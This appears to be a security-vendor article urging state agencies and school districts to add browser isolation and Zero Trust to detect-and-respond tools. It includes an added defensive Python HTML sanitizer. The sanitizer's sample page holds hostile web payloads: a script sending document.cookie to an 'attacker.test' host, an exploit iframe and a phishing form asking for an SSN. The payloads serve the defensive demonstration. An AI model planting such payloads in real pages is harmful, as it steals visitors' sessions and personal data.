State and local agencies, K–12 school districts, and public institutions of higher learning are rapidly becoming enticing targets for today’s enterprising threat actors. The combination of a large user base (citizens, contractors, and students, for example), a treasure trove of personally identifiable information (PII), and relatively small IT budgets provides a favorable cost-benefit analysis for malicious actors: a large payoff for a relatively small effort.
Just last month, the Indianapolis Housing Authority was hit with a ransomware attack that disrupted payments through the agency’s Housing Choice Voucher Program and exposed landlords’ personal information. In September, two K–12 school districts in Los Angeles and Michigan were victimized by ransomware attacks that closed schools for several days. These are not isolated incidents. According to a report from the K–12 Cybersecurity Resource Center, there were 408 cyberattacks on U.S. school districts in 2020.
As digital transformation, hybrid work, and remote learning change how public institutions operate, security teams for these organizations need to rethink how they protect their users, data, networks, and applications from dangerous, disruptive, and costly cyberattacks.
Threat actors are taking advantage of legacy security tools
The problem is that most public agencies and education organizations have not kept up with the advanced tactics used by modern threat actors. Today’s Highly Evasive Adaptive Threats (HEAT) allow hackers and ransomware gangs to bypass traditional security tools, gain initial access to vulnerable endpoints, spread laterally through the network in search of valuable targets, and when the time is right, deliver the payload that takes down or takes control of critical systems or data.
These HEAT attacks take advantage of vulnerabilities and shortcomings in traditional security tools that rely on a detect-and-respond approach and are still in use by many organizations. Such tools cede the initial access battlefield to threat actors and instead rely on detecting malicious activity that is already inside the network. Because modern attacks operate at the speed of business, by the time a detection fires the initial access has already succeeded, and the user, the endpoint, and whatever that endpoint can reach are already at risk.
The acceleration of digital transformation, cloud migration, hybrid work, and remote learning over the past several years has only exacerbated the shortcomings of the detect-and-respond approach. All it takes is a single user making a single click for the network, and everything that runs on it, to be exposed. This is especially troubling for higher education organizations that pride themselves on giving students the freedom to explore, share, and collaborate across open architectures. Restrictions imposed by traditional security controls such as strict firewall rules, URL filtering, and domain blocklists are seen as existential attacks on the school’s philosophy.
A complete rethink of cybersecurity is needed
But not all is lost. Organizations can take several steps now to better protect their growing and distributed IT infrastructure from today’s highly sophisticated threats. Here are three strategies that state agencies and education institutions can implement today to minimize their attack surface:
1. Layer preventative security on top of detection
The detect-and-respond approach isn’t an inherently flawed security strategy. It’s just incomplete. Organizations should add proactive, preventative capabilities, such as web and email isolation, on top of their existing security stack. Isolation treats all content, good or bad, as if it were malicious. Rather than being given free rein on the end device, content is executed in a remote layer in the cloud and only clean, sanitized content is delivered to the endpoint. Closing off this initial access removes the delivery path that ransomware and most other malware depend on, creating a layered, holistic approach that both prevents attacks and monitors for malicious behavior.
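The "deliver only sanitized content" step above is easier to reason about with a concrete instance. The following is an added example written for this page, not code from the original post or from any isolation product: a minimal allowlist HTML rewriter that drops active content (scripts, frames, event-handler attributes, javascript: and data: URLs) before a page is handed to the endpoint. Real isolation services render the page remotely and stream a safe representation instead; this rewriter only illustrates the allowlist-not-denylist principle. The sample page, the host names in it, and the allowed tag and attribute sets are constructed assumptions.

```python
"""Allowlist HTML rewriter (constructed example, not a product's code).

Everything not explicitly allowed is removed, which is the "assume all
content is malicious" posture of isolation applied to a single document.
"""
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed policy: small allowlists, not a denylist of known-bad constructs.
ALLOWED_TAGS = {"html", "body", "div", "span", "p", "br", "a", "img",
                "b", "i", "em", "strong", "h1", "h2", "h3",
                "ul", "ol", "li", "table", "tr", "td", "th"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}, "*": {"title"}}
SAFE_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br", "img"}
# Elements whose entire subtree is active content and must be dropped.
DROP_SUBTREE = {"script", "style", "iframe", "object", "embed",
                "noscript", "template", "svg", "math"}


def _safe_url(value: str) -> bool:
    # Strip control/whitespace characters first so "java\tscript:" is
    # not parsed as a scheme-less relative URL on older Python versions.
    cleaned = "".join(ch for ch in value if ord(ch) > 0x20)
    scheme = urlsplit(cleaned).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES


class Sanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.dropped: list[str] = []   # audit trail of what was removed
        self.skipping: list[str] = []  # stack of DROP_SUBTREE tags we are inside

    def handle_starttag(self, tag, attrs):
        if self.skipping:
            if tag in DROP_SUBTREE:
                self.skipping.append(tag)
            return
        if tag in DROP_SUBTREE:
            self.skipping.append(tag)
            self.dropped.append(tag)
            return
        if tag not in ALLOWED_TAGS:
            # Unknown structural tag: drop the tag, keep its text content.
            self.dropped.append(tag)
            return
        allowed = ALLOWED_ATTRS.get(tag, set()) | ALLOWED_ATTRS["*"]
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on") or name not in allowed:
                self.dropped.append(f"{tag}@{name}")
                continue
            if name in ("href", "src") and not _safe_url(value):
                self.dropped.append(f"{tag}@{name}")
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self.skipping:
            if tag == self.skipping[-1]:
                self.skipping.pop()
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(html.escape(data, quote=False))
    # Comments, doctype and processing instructions are silently discarded
    # because HTMLParser's default handlers emit nothing.


def sanitize(document: str) -> tuple[str, list[str]]:
    """Return (sanitized_html, list_of_dropped_items)."""
    parser = Sanitizer()
    parser.feed(document)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample page mimicking a phished payment portal.
SAMPLE = (
    '<html><body><h1 onclick="steal()">Voucher payment portal</h1>'
    '<p>Pay by <a href="https://example.test/pay" title="Pay">card</a> or '
    '<a href="javascript:alert(1)">here</a>.</p>'
    '<script>fetch("https://attacker.test/?c="+document.cookie)</script>'
    '<iframe src="https://attacker.test/exploit"></iframe>'
    '<img src="https://example.test/logo.png" alt="logo" onerror="evil()">'
    '<form action="https://attacker.test/phish"><input name="ssn"></form>'
    '</body></html>'
)

if __name__ == "__main__":
    clean, removed = sanitize(SAMPLE)
    print(clean)
    print("dropped:", removed)
```

The `dropped` list is the part a security team actually wants: it turns a silent rewrite into telemetry that can be fed to the existing detect-and-respond stack, which is the layering the section describes.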
2. Focus on the user
State and local agencies, K–12 school districts, and institutions of higher learning are increasingly going remote. Remote workers who are no longer protected inside the corporate network have become the new front line in the fight against threat actors, and they’re losing the battle. According to the World Economic Forum, 95% of security breaches are the result of human error. Security strategies should take this into account, evolve past the network-centric approach of the past, and focus on proactively protecting users wherever they log in. This may require creating a virtual air gap between users and the rest of the Internet, sealing them off from malicious content without impacting the native user experience. Rather than restricting what users can and cannot do, isolation protects them transparently in the background without changing how they access content on the Internet.
3. Secure private applications
Digital transformation is moving applications out of the data center to the edge of the network to accommodate remote users and to take advantage of the scale and economics of the cloud. Whether the user is a citizen applying for public services, an in-home medical professional uploading patient information to a digital health records system, or a student accessing research data from an off-campus apartment, critical data is increasingly put at risk on public infrastructure. Traditional tools such as virtual private networks (VPNs) are ill-suited to this level of traffic: they sap bandwidth, create performance bottlenecks, and, because a VPN grants network-level access once a user is in, provide a vulnerable access point for threat actors. Rather than rip and replace outdated infrastructure, organizations can isolate private applications in the cloud and implement Zero Trust policies that limit authorization to trusted entities, granting access to a specific application rather than to the network. Continually re-establishing trust for each session, instead of trusting a user indefinitely after a single login, ensures that users are who they say they are without constraining users who should have access.
A Zero Trust, preventative approach
State and local agencies, K–12 school districts, and public institutions of higher learning have not kept up with advanced HEAT attacks, which makes them enticing targets for malicious actors. These organizations need to rethink their security strategy to better address HEAT attacks, but they don’t necessarily have to rip out existing security infrastructure. A Zero Trust, preventative approach focused on the user and on private applications can be layered on top of existing detect-and-respond capabilities, giving security teams visibility and control over an expanding threat surface without impacting the user experience.